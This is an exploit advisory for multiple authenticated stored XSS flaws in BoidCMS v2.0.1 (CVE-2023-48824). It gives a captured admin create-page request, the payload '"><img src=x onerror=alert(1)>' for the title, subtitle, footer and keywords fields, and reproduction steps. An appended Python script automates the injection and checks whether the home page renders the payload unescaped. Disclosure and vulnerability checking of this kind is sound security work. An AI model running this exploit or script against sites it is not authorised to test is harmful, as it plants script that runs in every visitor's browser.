# Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS
# Date: 13/11/2023
# Exploit Author: BugsBD Limited
# Discover by: Rahad Chowdhury
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip
# Version: v2.0.1
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48824

Description:
BoidCMS v2.0.1 contains multiple authenticated stored cross-site scripting
(XSS) vulnerabilities. The "title", "subtitle", "footer" and "keywords"
parameters of the settings and create-page forms are stored without
sanitisation and rendered unescaped on the public home page, so script
supplied by an authenticated administrator runs in the browser of every
visitor. A valid admin session (and the form's CSRF token) is required to
plant the payload.


Steps to Reproduce:

1. Log in to the admin panel and submit the create-page form. The captured request (with placeholder values) is:

POST /BoidCMS/admin?page=create HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9882691211259772119227456445
Content-Length: 1492
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/BoidCMS/admin?page=create
Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20; KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k; KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc
Upgrade-Insecure-Requests: 1

-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="type"

post
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="title"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="descr"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="keywords"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="content"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="permalink"


-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="tpl"

theme.php
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="thumb"


-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="date"

2023-12-02T19:41
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="pub"

true
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="token"

83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="create"

Create
-----------------------------9882691211259772119227456445--


2. Replace the value of the "title", "subtitle", "footer" or "keywords"
parameter with the payload "><img src=x onerror=alert(1)> (title and
keywords are in the create-page request above; subtitle and footer are
submitted from the settings page in the same way).
3. Save, then open the site's home page: the payload is written into the
HTML unescaped and the alert fires.
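Added example (not part of this advisory or of BoidCMS): a Python script that automates steps 1 to 3 for the two injectable fields carried by the create-page form (title and keywords) and then reports whether the home page reflects the payload raw, HTML-encoded, or not at all. It assumes a valid admin PHPSESSID is passed on the command line and that the create page renders its CSRF token as an <input name="token" value="..."> element; both are assumptions, not facts from the advisory. The settings form (subtitle, footer) is not covered because its request is not shown above.

```python
"""Stored XSS check for the BoidCMS create-page form (added example, not vendor code).

Assumptions (not from the advisory): an already-authenticated PHPSESSID is
supplied by the caller, and the CSRF token appears on /admin?page=create as
<input name="token" value="...">. Network access happens only under __main__.
"""
import html
import re
import sys
import urllib.request
import uuid

# Payload from the advisory.
PAYLOAD = '"><img src=x onerror=alert(1)>'


def build_create_fields(param, payload, token):
    """Recreate the captured create-page form in its original field order,
    with `payload` substituted into `param` (the two injectable fields on this form)."""
    if param not in ("title", "keywords"):
        raise ValueError("the create form carries only title and keywords")
    fields = {
        "type": "post",
        "title": "test",
        "descr": "test",
        "keywords": "test",
        "content": "test",
        "permalink": "",
        "tpl": "theme.php",
        "thumb": "",
        "date": "2023-12-02T19:41",
        "pub": "true",
        "token": token,
        "create": "Create",
    }
    fields[param] = payload
    return fields


def build_multipart(fields, boundary):
    """Serialise fields as multipart/form-data the way the browser did (CRLF line endings)."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n"
        )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode()


def extract_token(page_html):
    """Read the CSRF token from the create page; the input markup is an assumption."""
    m = re.search(r'name="token"[^>]*value="([^"]*)"', page_html) or re.search(
        r'value="([^"]*)"[^>]*name="token"', page_html
    )
    return m.group(1) if m else None


def classify_reflection(page_html, payload):
    """'unescaped' if the raw payload is in the page (XSS), 'escaped' if only the
    HTML-encoded form is present (fixed), 'absent' if neither."""
    if payload in page_html:
        return "unescaped"
    if html.escape(payload, quote=True) in page_html:
        return "escaped"
    return "absent"


def inject_and_check(base_url, phpsessid, param):
    """Post the payload in `param` via the create form, then classify the home page."""
    opener = urllib.request.build_opener()
    opener.addheaders = [("Cookie", f"PHPSESSID={phpsessid}")]
    create_url = f"{base_url}/admin?page=create"
    token = extract_token(opener.open(create_url).read().decode(errors="replace"))
    if token is None:
        raise SystemExit("no CSRF token on the create page; is PHPSESSID an admin session?")
    boundary = "----boidxss" + uuid.uuid4().hex
    body = build_multipart(build_create_fields(param, PAYLOAD, token), boundary)
    req = urllib.request.Request(create_url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    opener.open(req).read()
    home = opener.open(base_url + "/").read().decode(errors="replace")
    return classify_reflection(home, PAYLOAD)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        raise SystemExit(f"usage: {sys.argv[0]} http://192.168.1.74/BoidCMS <PHPSESSID>")
    for field in ("title", "keywords"):
        print(field, inject_and_check(sys.argv[1].rstrip("/"), sys.argv[2], field))
```

The classifier treats only an exact htmlspecialchars-style encoding of the payload as "escaped"; any other transformation is reported as "absent" so that a partial filter is not mistaken for a fix.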



## Reproduce:
PoC repository: https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824